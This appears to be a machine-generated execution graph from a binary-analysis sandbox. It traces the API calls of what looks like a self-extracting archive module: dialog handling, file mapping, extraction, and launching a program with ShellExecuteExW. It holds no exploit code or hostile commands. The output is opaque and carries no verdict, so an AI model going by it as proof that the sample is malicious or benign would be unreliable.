                                                            execution_graph 25406 cd62ca 123 API calls __InternalCxxFrameHandler 25379 cdb5c0 100 API calls 25421 cd77c0 118 API calls 25422 cdffc0 RaiseException _com_raise_error _com_error::_com_error 23466 cddec2 23467 cddecf 23466->23467 23474 cce617 23467->23474 23475 cce627 23474->23475 23486 cce648 23475->23486 23478 cc4092 23509 cc4065 23478->23509 23481 cdb568 PeekMessageW 23482 cdb5bc 23481->23482 23483 cdb583 GetMessageW 23481->23483 23484 cdb599 IsDialogMessageW 23483->23484 23485 cdb5a8 TranslateMessage DispatchMessageW 23483->23485 23484->23482 23484->23485 23485->23482 23492 ccd9b0 23486->23492 23489 cce66b LoadStringW 23490 cce645 23489->23490 23491 cce682 LoadStringW 23489->23491 23490->23478 23491->23490 23497 ccd8ec 23492->23497 23494 ccd9cd 23495 ccd9e2 23494->23495 23505 ccd9f0 26 API calls 23494->23505 23495->23489 23495->23490 23498 ccd904 23497->23498 23504 ccd984 _strncpy 23497->23504 23499 ccd928 23498->23499 23506 cd1da7 WideCharToMultiByte 23498->23506 23501 ccd959 23499->23501 23507 cce5b1 50 API calls __vsnprintf 23499->23507 23508 ce6159 26 API calls 3 library calls 23501->23508 23504->23494 23505->23495 23506->23499 23507->23501 23508->23504 23510 cc407c __vsnwprintf_l 23509->23510 23513 ce5fd4 23510->23513 23516 ce4097 23513->23516 23517 ce40bf 23516->23517 23518 ce40d7 23516->23518 23540 ce91a8 20 API calls __dosmaperr 23517->23540 23518->23517 23520 ce40df 23518->23520 23542 ce4636 23520->23542 23521 ce40c4 23541 ce9087 26 API calls __cftof 23521->23541 23527 ce4167 23551 ce49e6 51 API calls 4 library calls 23527->23551 23528 cc4086 SetDlgItemTextW 23528->23481 23530 ce4172 23552 ce46b9 20 API calls _free 23530->23552 23532 ce40cf 23533 cdfbbc 23532->23533 23534 cdfbc5 IsProcessorFeaturePresent 23533->23534 23535 cdfbc4 23533->23535 23537 cdfc07 23534->23537 23535->23528 23553 cdfbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23537->23553 23539 cdfcea 23539->23528 23540->23521 23541->23532 23543 ce4653 23542->23543 23549 ce40ef 23542->23549 23543->23549 23554 ce97e5 GetLastError 23543->23554 23545 ce4674 23574 ce993a 38 API calls __cftof 23545->23574 23547 ce468d 23575 ce9967 38 API calls __cftof 23547->23575 23550 ce4601 20 API calls 2 library calls 23549->23550 23550->23527 23551->23530 23552->23532 23553->23539 23555 ce97fb 23554->23555 23556 ce9801 23554->23556 23576 ceae5b 11 API calls 2 library calls 23555->23576 23560 ce9850 SetLastError 23556->23560 23577 ceb136 23556->23577 23560->23545 23561 ce981b 23584 ce8dcc 23561->23584 23564 ce9830 23564->23561 23565 ce9837 23564->23565 23591 ce9649 20 API calls __dosmaperr 23565->23591 23566 ce9821 23568 ce985c SetLastError 23566->23568 23592 ce8d24 38 API calls _abort 23568->23592 23569 ce9842 23571 ce8dcc _free 20 API calls 23569->23571 23573 ce9849 23571->23573 23573->23560 23573->23568 23574->23547 23575->23549 23576->23556 23583 ceb143 __dosmaperr 23577->23583 23578 ceb183 23594 ce91a8 20 API calls __dosmaperr 23578->23594 23579 ceb16e RtlAllocateHeap 23581 ce9813 23579->23581 23579->23583 23581->23561 23590 ceaeb1 11 API calls 2 library calls 23581->23590 23583->23578 23583->23579 23593 ce7a5e 7 API calls 2 library calls 23583->23593 23585 ce8dd7 RtlFreeHeap 23584->23585 23586 ce8e00 __dosmaperr 23584->23586 23585->23586 23587 ce8dec 23585->23587 23586->23566 23595 ce91a8 20 API calls __dosmaperr 23587->23595 23589 ce8df2 GetLastError 23589->23586 23590->23564 23591->23569 23593->23583 23594->23581 23595->23589 25407 ce0ada 51 API calls 2 library calls 23705 cc10d5 23710 cc5abd 23705->23710 23711 cc5ac7 __EH_prolog 23710->23711 23717 ccb505 23711->23717 23713 cc5ad3 23723 cc5cac GetCurrentProcess GetProcessAffinityMask 23713->23723 23718 ccb50f __EH_prolog 23717->23718 23724 ccf1d0 82 API calls 23718->23724 23720 ccb521 23725 ccb61e 23720->23725 23724->23720 23726 ccb630 __cftof 23725->23726 23729 cd10dc 23726->23729 23732 cd109e GetCurrentProcess GetProcessAffinityMask 23729->23732 23733 ccb597 23732->23733 23733->23713 23734 cde2d7 23735 cde1db 23734->23735 23736 cde85d ___delayLoadHelper2@8 14 API calls 23735->23736 23736->23735 23737 cde1d1 14 API calls ___delayLoadHelper2@8 25344 cdf4d3 20 API calls 25423 cea3d0 21 API calls 2 library calls 25424 cf2bd0 VariantClear 25381 ccf1e8 FreeLibrary 23747 cdeae7 23748 cdeaf1 23747->23748 23749 cde85d ___delayLoadHelper2@8 14 API calls 23748->23749 23750 cdeafe 23749->23750 25345 cdf4e7 29 API calls _abort 23751 cdb7e0 23752 cdb7ea __EH_prolog 23751->23752 23919 cc1316 23752->23919 23755 cdbf0f 23991 cdd69e 23755->23991 23756 cdb82a 23758 cdb838 23756->23758 23759 cdb89b 23756->23759 23831 cdb841 23756->23831 23762 cdb83c 23758->23762 23763 cdb878 23758->23763 23761 cdb92e GetDlgItemTextW 23759->23761 23766 cdb8b1 23759->23766 23761->23763 23769 cdb96b 23761->23769 23773 cce617 53 API calls 23762->23773 23762->23831 23770 cdb95f KiUserCallbackDispatcher 23763->23770 23763->23831 23764 cdbf38 23767 cdbf41 SendDlgItemMessageW 23764->23767 23768 cdbf52 GetDlgItem SendMessageW 23764->23768 23765 cdbf2a SendMessageW 23765->23764 23772 cce617 53 API calls 23766->23772 23767->23768 24009 cda64d GetCurrentDirectoryW 23768->24009 23771 cdb980 GetDlgItem 23769->23771 23917 cdb974 23769->23917 23770->23831 23775 cdb994 SendMessageW SendMessageW 23771->23775 23776 cdb9b7 SetFocus 23771->23776 23777 cdb8ce SetDlgItemTextW 23772->23777 23778 cdb85b 23773->23778 23775->23776 23780 cdb9c7 23776->23780 23795 cdb9e0 23776->23795 23781 cdb8d9 23777->23781 24031 cc124f SHGetMalloc 23778->24031 23779 cdbf82 GetDlgItem 23783 cdbf9f 23779->23783 23784 cdbfa5 SetWindowTextW 23779->23784 23785 cce617 53 API calls 23780->23785 23789 cdb8e6 GetMessageW 23781->23789 23781->23831 23783->23784 24010 cdabab GetClassNameW 23784->24010 23790 cdb9d1 23785->23790 23786 cdbe55 23791 cce617 53 API calls 23786->23791 23793 cdb8fd IsDialogMessageW 23789->23793 23789->23831 24032 cdd4d4 23790->24032 23797 cdbe65 SetDlgItemTextW 23791->23797 23793->23781 23800 cdb90c TranslateMessage DispatchMessageW 23793->23800 23801 cce617 53 API calls 23795->23801 23796 cdc1fc SetDlgItemTextW 23796->23831 23798 cdbe79 23797->23798 23803 cce617 53 API calls 23798->23803 23800->23781 23802 cdba17 23801->23802 23805 cc4092 _swprintf 51 API calls 23802->23805 23840 cdbe9c _wcslen 23803->23840 23804 cdbff0 23808 cdc020 23804->23808 23811 cce617 53 API calls 23804->23811 23810 cdba29 23805->23810 23806 cdc73f 97 API calls 23806->23804 23807 cdb9d9 23929 cca0b1 23807->23929 23818 cdc73f 97 API calls 23808->23818 23863 cdc0d8 23808->23863 23813 cdd4d4 16 API calls 23810->23813 23815 cdc003 SetDlgItemTextW 23811->23815 23813->23807 23814 cdc18b 23820 cdc19d 23814->23820 23821 cdc194 EnableWindow 23814->23821 23823 cce617 53 API calls 23815->23823 23816 cdba68 GetLastError 23817 cdba73 23816->23817 23935 cdac04 SetCurrentDirectoryW 23817->23935 23819 cdc03b 23818->23819 23832 cdc04d 23819->23832 23860 cdc072 23819->23860 23826 cdc1ba 23820->23826 24050 cc12d3 GetDlgItem EnableWindow 23820->24050 23821->23820 23822 cdbeed 23825 cce617 53 API calls 23822->23825 23827 cdc017 SetDlgItemTextW 23823->23827 23825->23831 23835 cdc1e1 23826->23835 23845 cdc1d9 SendMessageW 23826->23845 23827->23808 23828 cdba87 23829 cdba9e 23828->23829 23830 cdba90 GetLastError 23828->23830 23837 cdbb11 23829->23837 23842 cdbb20 23829->23842 23846 cdbaae GetTickCount 23829->23846 23830->23829 24048 cd9ed5 32 API calls 23832->24048 23833 cdc0cb 23836 cdc73f 97 API calls 23833->23836 23835->23831 23847 cce617 53 API calls 23835->23847 23836->23863 23841 cdbd56 23837->23841 23837->23842 23839 cdc1b0 24051 cc12d3 GetDlgItem EnableWindow 23839->24051 23840->23822 23848 cce617 53 API calls 23840->23848 23951 cc12f1 GetDlgItem ShowWindow 23841->23951 23849 cdbcfb 23842->23849 23851 cdbb39 GetModuleFileNameW 23842->23851 23852 cdbcf1 23842->23852 23843 cdc066 23843->23860 23845->23835 23854 cc4092 _swprintf 51 API calls 23846->23854 23855 cdb862 23847->23855 23856 cdbed0 23848->23856 23859 cce617 53 API calls 23849->23859 23850 cdc169 24049 cd9ed5 32 API calls 23850->24049 24042 ccf28c 82 API calls 23851->24042 23852->23763 23852->23849 23862 cdbac7 23854->23862 23855->23796 23855->23831 23864 cc4092 _swprintf 51 API calls 23856->23864 23867 cdbd05 23859->23867 23860->23833 23868 cdc73f 97 API calls 23860->23868 23861 cdbd66 23952 cc12f1 GetDlgItem ShowWindow 23861->23952 23936 cc966e 23862->23936 23863->23814 23863->23850 23870 cce617 53 API calls 23863->23870 23864->23822 23865 cdc188 23865->23814 23866 cdbb5f 23871 cc4092 _swprintf 51 API calls 23866->23871 23872 cc4092 _swprintf 51 API calls 23867->23872 23873 cdc0a0 23868->23873 23870->23863 23875 cdbb81 CreateFileMappingW 23871->23875 23876 cdbd23 23872->23876 23873->23833 23877 cdc0a9 DialogBoxParamW 23873->23877 23874 cdbd70 23878 cce617 53 API calls 23874->23878 23880 cdbbe3 GetCommandLineW 23875->23880 23913 cdbc60 __InternalCxxFrameHandler 23875->23913 23889 cce617 53 API calls 23876->23889 23877->23763 23877->23833 23881 cdbd7a SetDlgItemTextW 23878->23881 23883 cdbbf4 23880->23883 23953 cc12f1 GetDlgItem ShowWindow 23881->23953 23882 cdbaed 23886 cdbaf4 GetLastError 23882->23886 23887 cdbaff 23882->23887 24043 cdb425 SHGetMalloc 23883->24043 23884 cdbc6b ShellExecuteExW 23910 cdbc88 23884->23910 23886->23887 23944 cc959a 23887->23944 23893 cdbd3d 23889->23893 23890 cdbd8c SetDlgItemTextW GetDlgItem 23894 cdbda9 GetWindowLongW SetWindowLongW 23890->23894 23895 cdbdc1 23890->23895 23892 cdbc10 24044 cdb425 SHGetMalloc 23892->24044 23894->23895 23954 cdc73f 23895->23954 23898 cdbc1c 24045 cdb425 SHGetMalloc 23898->24045 23901 cdbccb 23901->23852 23906 cdbce1 UnmapViewOfFile CloseHandle 23901->23906 23902 cdc73f 97 API calls 23904 cdbddd 23902->23904 23903 cdbc28 24046 ccf3fa 82 API calls 2 library calls 23903->24046 23979 cdda52 23904->23979 23906->23852 23909 cdbc3f MapViewOfFile 23909->23913 23910->23901 23911 cdbcb7 Sleep 23910->23911 23911->23901 23911->23910 23912 cdc73f 97 API calls 23914 cdbe03 23912->23914 23913->23884 23915 cdbe2c 23914->23915 23918 cdc73f 97 API calls 23914->23918 24047 cc12d3 GetDlgItem EnableWindow 23915->24047 23917->23763 23917->23786 23918->23915 23920 cc131f 23919->23920 23921 cc1378 23919->23921 23923 cc1385 23920->23923 24052 cce2e8 62 API calls 2 library calls 23920->24052 24053 cce2c1 GetWindowLongW SetWindowLongW 23921->24053 23923->23755 23923->23756 23923->23831 23925 cc1341 23925->23923 23926 cc1354 GetDlgItem 23925->23926 23926->23923 23927 cc1364 23926->23927 23927->23923 23928 cc136a SetWindowTextW 23927->23928 23928->23923 23932 cca0bb 23929->23932 23930 cca14c 23931 cca2b2 8 API calls 23930->23931 23933 cca175 23930->23933 23931->23933 23932->23930 23932->23933 24054 cca2b2 23932->24054 23933->23816 23933->23817 23935->23828 23937 cc9678 23936->23937 23938 cc96d5 CreateFileW 23937->23938 23939 cc96c9 23937->23939 23938->23939 23940 cc971f 23939->23940 23941 ccbb03 GetCurrentDirectoryW 23939->23941 23940->23882 23942 cc9704 23941->23942 23942->23940 23943 cc9708 CreateFileW 23942->23943 23943->23940 23945 cc95be 23944->23945 23946 cc95cf 23944->23946 23945->23946 23947 cc95ca 23945->23947 23948 cc95d1 23945->23948 23946->23837 24075 cc974e 23947->24075 24080 cc9620 23948->24080 23951->23861 23952->23874 23953->23890 23955 cdc749 __EH_prolog 23954->23955 23956 cdbdcf 23955->23956 23957 cdb314 ExpandEnvironmentStringsW 23955->23957 23956->23902 23966 cdc780 _wcslen _wcsrchr 23957->23966 23959 cdb314 ExpandEnvironmentStringsW 23959->23966 23960 cdca67 SetWindowTextW 23960->23966 23963 ce3e3e 22 API calls 23963->23966 23965 cdc855 SetFileAttributesW 23968 cdc90f GetFileAttributesW 23965->23968 23969 cdc86f __cftof _wcslen 23965->23969 23966->23956 23966->23959 23966->23960 23966->23963 23966->23965 23972 cdcc31 GetDlgItem SetWindowTextW SendMessageW 23966->23972 23974 cdcc71 SendMessageW 23966->23974 24095 cd1fbb CompareStringW 23966->24095 24096 cda64d GetCurrentDirectoryW 23966->24096 24098 cca5d1 6 API calls 23966->24098 24099 cca55a FindClose 23966->24099 24100 cdb48e 76 API calls 2 library calls 23966->24100 23968->23966 23970 cdc921 DeleteFileW 23968->23970 23969->23966 23969->23968 24097 ccb991 51 API calls 2 library calls 23969->24097 23970->23966 23976 cdc932 23970->23976 23972->23966 23973 cc4092 _swprintf 51 API calls 23975 cdc952 GetFileAttributesW 23973->23975 23974->23966 23975->23976 23977 cdc967 MoveFileW 23975->23977 23976->23973 23977->23966 23978 cdc97f MoveFileExW 23977->23978 23978->23966 23980 cdda5c __EH_prolog 23979->23980 24101 cd0659 23980->24101 23982 cdda8d 24105 cc5b3d 23982->24105 23984 cddaab 24109 cc7b0d 23984->24109 23988 cddafe 24125 cc7b9e 23988->24125 23990 cdbdee 23990->23912 23992 cdd6a8 23991->23992 24613 cda5c6 23992->24613 23995 cdd6b5 GetWindow 23996 cdbf15 23995->23996 24002 cdd6d5 23995->24002 23996->23764 23996->23765 23997 cdd6e2 GetClassNameW 24618 cd1fbb CompareStringW 23997->24618 23999 cdd76a GetWindow 23999->23996 23999->24002 24000 cdd706 GetWindowLongW 24000->23999 24001 cdd716 SendMessageW 24000->24001 24001->23999 24003 cdd72c GetObjectW 24001->24003 24002->23996 24002->23997 24002->23999 24002->24000 24619 cda605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24003->24619 24005 cdd743 24620 cda5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24005->24620 24621 cda80c 8 API calls 24005->24621 24008 cdd754 SendMessageW DeleteObject 24008->23999 24009->23779 24011 cdabcc 24010->24011 24016 cdabf1 24010->24016 24624 cd1fbb CompareStringW 24011->24624 24012 cdabff 24018 cdb093 24012->24018 24013 cdabf6 SHAutoComplete 24013->24012 24015 cdabdf 24015->24016 24017 cdabe3 FindWindowExW 24015->24017 24016->24012 24016->24013 24017->24016 24019 cdb09d __EH_prolog 24018->24019 24020 cc13dc 84 API calls 24019->24020 24021 cdb0bf 24020->24021 24625 cc1fdc 24021->24625 24024 cdb0d9 24026 cc1692 86 API calls 24024->24026 24025 cdb0eb 24027 cc19af 128 API calls 24025->24027 24028 cdb0e4 24026->24028 24030 cdb10d __InternalCxxFrameHandler ___std_exception_copy 24027->24030 24028->23804 24028->23806 24029 cc1692 86 API calls 24029->24028 24030->24029 24031->23855 24033 cdb568 5 API calls 24032->24033 24034 cdd4e0 GetDlgItem 24033->24034 24035 cdd536 SendMessageW SendMessageW 24034->24035 24036 cdd502 24034->24036 24037 cdd591 SendMessageW SendMessageW SendMessageW 24035->24037 24038 cdd572 24035->24038 24039 cdd50d ShowWindow SendMessageW SendMessageW 24036->24039 24040 cdd5c4 SendMessageW 24037->24040 24041 cdd5e7 SendMessageW 24037->24041 24038->24037 24039->24035 24040->24041 24041->23807 24042->23866 24043->23892 24044->23898 24045->23903 24046->23909 24047->23917 24048->23843 24049->23865 24050->23839 24051->23826 24052->23925 24053->23923 24055 cca2bf 24054->24055 24056 cca2e3 24055->24056 24057 cca2d6 CreateDirectoryW 24055->24057 24058 cca231 3 API calls 24056->24058 24057->24056 24059 cca316 24057->24059 24060 cca2e9 24058->24060 24063 cca325 24059->24063 24067 cca4ed 24059->24067 24061 cca329 GetLastError 24060->24061 24064 ccbb03 GetCurrentDirectoryW 24060->24064 24061->24063 24063->23932 24065 cca2ff 24064->24065 24065->24061 24066 cca303 CreateDirectoryW 24065->24066 24066->24059 24066->24061 24068 cdec50 24067->24068 24069 cca4fa SetFileAttributesW 24068->24069 24070 cca53d 24069->24070 24071 cca510 24069->24071 24070->24063 24072 ccbb03 GetCurrentDirectoryW 24071->24072 24073 cca524 24072->24073 24073->24070 24074 cca528 SetFileAttributesW 24073->24074 24074->24070 24076 cc9781 24075->24076 24077 cc9757 24075->24077 24076->23946 24077->24076 24086 cca1e0 24077->24086 24081 cc962c 24080->24081 24082 cc964a 24080->24082 24081->24082 24084 cc9638 FindCloseChangeNotification 24081->24084 24083 cc9669 24082->24083 24094 cc6bd5 76 API calls 24082->24094 24083->23946 24084->24082 24087 cdec50 24086->24087 24088 cca1ed DeleteFileW 24087->24088 24089 cc977f 24088->24089 24090 cca200 24088->24090 24089->23946 24091 ccbb03 GetCurrentDirectoryW 24090->24091 24092 cca214 24091->24092 24092->24089 24093 cca218 DeleteFileW 24092->24093 24093->24089 24094->24083 24095->23966 24096->23966 24097->23969 24098->23966 24099->23966 24100->23966 24102 cd0666 _wcslen 24101->24102 24129 cc17e9 24102->24129 24104 cd067e 24104->23982 24106 cd0659 _wcslen 24105->24106 24107 cc17e9 78 API calls 24106->24107 24108 cd067e 24107->24108 24108->23984 24110 cc7b17 __EH_prolog 24109->24110 24146 ccce40 24110->24146 24112 cc7b32 24152 cdeb38 24112->24152 24114 cc7b5c 24161 cd4a76 24114->24161 24117 cc7c7d 24118 cc7c87 24117->24118 24120 cc7cf1 24118->24120 24193 cca56d 24118->24193 24122 cc7d50 24120->24122 24171 cc8284 24120->24171 24121 cc7d92 24121->23988 24122->24121 24199 cc138b 74 API calls 24122->24199 24126 cc7bac 24125->24126 24128 cc7bb3 24125->24128 24127 cd2297 86 API calls 24126->24127 24127->24128 24130 cc17ff 24129->24130 24141 cc185a __InternalCxxFrameHandler 24129->24141 24131 cc1828 24130->24131 24142 cc6c36 76 API calls __vswprintf_c_l 24130->24142 24133 cc1887 24131->24133 24136 cc1847 ___std_exception_copy 24131->24136 24135 ce3e3e 22 API calls 24133->24135 24134 cc181e 24143 cc6ca7 75 API calls 24134->24143 24138 cc188e 24135->24138 24136->24141 24144 cc6ca7 75 API calls 24136->24144 24138->24141 24145 cc6ca7 75 API calls 24138->24145 24141->24104 24142->24134 24143->24131 24144->24141 24145->24141 24147 ccce4a __EH_prolog 24146->24147 24148 cdeb38 8 API calls 24147->24148 24149 ccce8d 24148->24149 24150 cdeb38 8 API calls 24149->24150 24151 ccceb1 24150->24151 24151->24112 24153 cdeb3d ___std_exception_copy 24152->24153 24154 cdeb57 24153->24154 24157 cdeb59 24153->24157 24167 ce7a5e 7 API calls 2 library calls 24153->24167 24154->24114 24156 cdf5c9 24169 ce238d RaiseException 24156->24169 24157->24156 24168 ce238d RaiseException 24157->24168 24160 cdf5e6 24162 cd4a80 __EH_prolog 24161->24162 24163 cdeb38 8 API calls 24162->24163 24164 cd4a9c 24163->24164 24165 cc7b8b 24164->24165 24170 cd0e46 80 API calls 24164->24170 24165->24117 24167->24153 24168->24156 24169->24160 24170->24165 24172 cc828e __EH_prolog 24171->24172 24200 cc13dc 24172->24200 24174 cc82aa 24175 cc82bb 24174->24175 24343 cc9f42 24174->24343 24178 cc82f2 24175->24178 24208 cc1a04 24175->24208 24339 cc1692 24178->24339 24184 cc83e8 24235 cc1f6d 24184->24235 24187 cc83f3 24187->24178 24239 cc3b2d 24187->24239 24251 cc848e 24187->24251 24189 cca56d 7 API calls 24190 cc82ee 24189->24190 24190->24178 24190->24189 24192 cc8389 24190->24192 24347 ccc0c5 CompareStringW _wcslen 24190->24347 24227 cc8430 24192->24227 24194 cca582 24193->24194 24195 cca5b0 24194->24195 24602 cca69b 24194->24602 24195->24118 24197 cca592 24197->24195 24198 cca597 FindClose 24197->24198 24198->24195 24199->24121 24201 cc13e1 __EH_prolog 24200->24201 24202 ccce40 8 API calls 24201->24202 24203 cc1419 24202->24203 24204 cdeb38 8 API calls 24203->24204 24207 cc1474 __cftof 24203->24207 24205 cc1461 24204->24205 24206 ccb505 84 API calls 24205->24206 24205->24207 24206->24207 24207->24174 24209 cc1a0e __EH_prolog 24208->24209 24221 cc1a61 24209->24221 24224 cc1b9b 24209->24224 24348 cc13ba 24209->24348 24212 cc1bc7 24360 cc138b 74 API calls 24212->24360 24214 cc3b2d 101 API calls 24217 cc1c12 24214->24217 24215 cc1bd4 24215->24214 24215->24224 24216 cc1c5a 24220 cc1c8d 24216->24220 24216->24224 24361 cc138b 74 API calls 24216->24361 24217->24216 24219 cc3b2d 101 API calls 24217->24219 24219->24217 24220->24224 24225 cc9e80 79 API calls 24220->24225 24221->24212 24221->24215 24221->24224 24222 cc3b2d 101 API calls 24223 cc1cde 24222->24223 24223->24222 24223->24224 24224->24190 24225->24223 24381 cccf3d 24227->24381 24229 cc8440 24385 cd13d2 GetSystemTime SystemTimeToFileTime 24229->24385 24231 cc83a3 24231->24184 24232 cd1b66 24231->24232 24390 cdde6b 24232->24390 24236 cc1f72 __EH_prolog 24235->24236 24238 cc1fa6 24236->24238 24398 cc19af 24236->24398 24238->24187 24240 cc3b3d 24239->24240 24241 cc3b39 24239->24241 24250 cc9e80 79 API calls 24240->24250 24241->24187 24242 cc3b4f 24243 cc3b78 24242->24243 24244 cc3b6a 24242->24244 24529 cc286b 101 API calls 3 library calls 24243->24529 24249 cc3baa 24244->24249 24528 cc32f7 89 API calls 2 library calls 24244->24528 24247 cc3b76 24247->24249 24530 cc20d7 74 API calls 24247->24530 24249->24187 24250->24242 24252 cc8498 __EH_prolog 24251->24252 24257 cc84d5 24252->24257 24262 cc8513 24252->24262 24555 cd8c8d 103 API calls 24252->24555 24253 cc84f5 24255 cc851c 24253->24255 24256 cc84fa 24253->24256 24255->24262 24557 cd8c8d 103 API calls 24255->24557 24256->24262 24556 cc7a0d 152 API calls 24256->24556 24257->24253 24259 cc857a 24257->24259 24257->24262 24259->24262 24531 cc5d1a 24259->24531 24262->24187 24263 cc8605 24263->24262 24537 cc8167 24263->24537 24266 cc8797 24267 cca56d 7 API calls 24266->24267 24268 cc8802 24266->24268 24267->24268 24543 cc7c0d 24268->24543 24270 ccd051 82 API calls 24271 cc885d 24270->24271 24271->24262 24271->24270 24272 cc898b 24271->24272 24273 cc8992 24271->24273 24558 cc8117 84 API calls 24271->24558 24559 cc2021 74 API calls 24271->24559 24560 cc2021 74 API calls 24272->24560 24274 cc8a5f 24273->24274 24279 cc89e1 24273->24279 24278 cc8ab6 24274->24278 24292 cc8a6a 24274->24292 24277 cc8b14 24281 cc8b82 24277->24281 24327 cc9105 24277->24327 24564 cc98bc 24277->24564 24285 cc8a4c 24278->24285 24563 cc7fc0 97 API calls 24278->24563 24279->24277 24284 cca231 3 API calls 24279->24284 24279->24285 24288 ccab1a 8 API calls 24281->24288 24282 cc959a 80 API calls 24282->24262 24283 cc959a 80 API calls 24283->24262 24287 cc8a19 24284->24287 24285->24277 24286 cc8ab4 24285->24286 24286->24283 24287->24285 24561 cc92a3 97 API calls 24287->24561 24290 cc8bd1 24288->24290 24293 ccab1a 8 API calls 24290->24293 24292->24286 24562 cc7db2 101 API calls 24292->24562 24309 cc8be7 24293->24309 24297 cc8b70 24568 cc6e98 77 API calls 24297->24568 24299 cc8d18 24302 cc8d8a 24299->24302 24303 cc8d28 24299->24303 24300 cc8e40 24304 cc8e66 24300->24304 24305 cc8e52 24300->24305 24324 cc8d49 24300->24324 24301 cc8cbc 24301->24299 24301->24300 24310 cc8167 19 API calls 24302->24310 24306 cc8d6e 24303->24306 24315 cc8d37 24303->24315 24308 cd3377 75 API calls 24304->24308 24307 cc9215 123 API calls 24305->24307 24306->24324 24571 cc77b8 111 API calls 24306->24571 24307->24324 24311 cc8e7f 24308->24311 24309->24301 24312 cc8c93 24309->24312 24318 cc981a 79 API calls 24309->24318 24314 cc8dbd 24310->24314 24574 cd3020 123 API calls 24311->24574 24312->24301 24569 cc9a3c 82 API calls 24312->24569 24320 cc8df5 24314->24320 24321 cc8de6 24314->24321 24314->24324 24570 cc2021 74 API calls 24315->24570 24318->24312 24573 cc9155 93 API calls __EH_prolog 24320->24573 24572 cc7542 85 API calls 24321->24572 24330 cc8f85 24324->24330 24575 cc2021 74 API calls 24324->24575 24326 cc9090 24326->24327 24328 cca4ed 3 API calls 24326->24328 24327->24282 24331 cc90eb 24328->24331 24329 cc903e 24550 cc9da2 24329->24550 24330->24326 24330->24327 24330->24329 24549 cc9f09 SetEndOfFile 24330->24549 24331->24327 24576 cc2021 74 API calls 24331->24576 24334 cc9085 24336 cc9620 77 API calls 24334->24336 24336->24326 24337 cc90fb 24577 cc6dcb 76 API calls 24337->24577 24340 cc16a4 24339->24340 24593 cccee1 24340->24593 24344 cc9f59 24343->24344 24346 cc9f63 24344->24346 24601 cc6d0c 78 API calls 24344->24601 24346->24175 24347->24190 24362 cc1732 24348->24362 24350 cc13d6 24351 cc9e80 24350->24351 24352 cc9e92 24351->24352 24353 cc9ea5 24351->24353 24354 cc9eb0 24352->24354 24379 cc6d5b 77 API calls 24352->24379 24353->24354 24356 cc9eb8 SetFilePointer 24353->24356 24354->24221 24356->24354 24357 cc9ed4 GetLastError 24356->24357 24357->24354 24358 cc9ede 24357->24358 24358->24354 24380 cc6d5b 77 API calls 24358->24380 24360->24224 24361->24220 24363 cc1748 24362->24363 24374 cc17a0 __InternalCxxFrameHandler 24362->24374 24364 cc1771 24363->24364 24375 cc6c36 76 API calls __vswprintf_c_l 24363->24375 24366 cc17c7 24364->24366 24369 cc178d ___std_exception_copy 24364->24369 24368 ce3e3e 22 API calls 24366->24368 24367 cc1767 24376 cc6ca7 75 API calls 24367->24376 24371 cc17ce 24368->24371 24369->24374 24377 cc6ca7 75 API calls 24369->24377 24371->24374 24378 cc6ca7 75 API calls 24371->24378 24374->24350 24375->24367 24376->24364 24377->24374 24378->24374 24379->24353 24380->24354 24382 cccf4d 24381->24382 24384 cccf54 24381->24384 24386 cc981a 24382->24386 24384->24229 24385->24231 24387 cc9833 24386->24387 24389 cc9e80 79 API calls 24387->24389 24388 cc9865 24388->24384 24389->24388 24391 cdde78 24390->24391 24392 cce617 53 API calls 24391->24392 24393 cdde9b 24392->24393 24394 cc4092 _swprintf 51 API calls 24393->24394 24395 cddead 24394->24395 24396 cdd4d4 16 API calls 24395->24396 24397 cd1b7c 24396->24397 24397->24184 24399 cc19bf 24398->24399 24401 cc19bb 24398->24401 24402 cc18f6 24399->24402 24401->24238 24403 cc1908 24402->24403 24404 cc1945 24402->24404 24405 cc3b2d 101 API calls 24403->24405 24410 cc3fa3 24404->24410 24408 cc1928 24405->24408 24408->24401 24413 cc3fac 24410->24413 24411 cc3b2d 101 API calls 24411->24413 24412 cc1966 24412->24408 24415 cc1e50 24412->24415 24413->24411 24413->24412 24427 cd0e08 24413->24427 24416 cc1e5a __EH_prolog 24415->24416 24435 cc3bba 24416->24435 24418 cc1e84 24419 cc1732 78 API calls 24418->24419 24422 cc1f0b 24418->24422 24420 cc1e9b 24419->24420 24463 cc18a9 78 API calls 24420->24463 24422->24408 24423 cc1eb3 24425 cc1ebf _wcslen 24423->24425 24464 cd1b84 MultiByteToWideChar 24423->24464 24465 cc18a9 78 API calls 24425->24465 24428 cd0e0f 24427->24428 24429 cd0e2a 24428->24429 24433 cc6c31 RaiseException _com_raise_error 24428->24433 24430 cd0e3b SetThreadExecutionState 24429->24430 24434 cc6c31 RaiseException _com_raise_error 24429->24434 24430->24413 24433->24429 24434->24430 24436 cc3bc4 __EH_prolog 24435->24436 24437 cc3bda 24436->24437 24438 cc3bf6 24436->24438 24491 cc138b 74 API calls 24437->24491 24439 cc3e51 24438->24439 24443 cc3c22 24438->24443 24508 cc138b 74 API calls 24439->24508 24442 cc3be5 24442->24418 24443->24442 24466 cd3377 24443->24466 24445 cc3ca3 24447 cc3d2e 24445->24447 24462 cc3c9a 24445->24462 24494 ccd051 24445->24494 24446 cc3c9f 24446->24445 24493 cc20bd 78 API calls 24446->24493 24476 ccab1a 24447->24476 24449 cc3c8f 24492 cc138b 74 API calls 24449->24492 24450 cc3c71 24450->24445 24450->24446 24450->24449 24451 cc3d41 24456 cc3dd7 24451->24456 24457 cc3dc7 24451->24457 24500 cd3020 123 API calls 24456->24500 24480 cc9215 24457->24480 24460 cc3dd5 24460->24462 24501 cc2021 74 API calls 24460->24501 24502 cd2297 24462->24502 24463->24423 24464->24425 24465->24422 24467 cd338c 24466->24467 24469 cd3396 ___std_exception_copy 24466->24469 24509 cc6ca7 75 API calls 24467->24509 24470 cd341c 24469->24470 24471 cd3440 __cftof 24469->24471 24472 cd34c6 24469->24472 24510 cd32aa 75 API calls 3 library calls 24470->24510 24471->24450 24511 ce238d RaiseException 24472->24511 24475 cd34f2 24477 ccab28 24476->24477 24479 ccab32 24476->24479 24478 cdeb38 8 API calls 24477->24478 24478->24479 24479->24451 24481 cc921f __EH_prolog 24480->24481 24512 cc7c64 24481->24512 24484 cc13ba 78 API calls 24485 cc9231 24484->24485 24515 ccd114 24485->24515 24487 cc928a 24487->24460 24489 ccd114 118 API calls 24490 cc9243 24489->24490 24490->24487 24490->24489 24524 ccd300 97 API calls __InternalCxxFrameHandler 24490->24524 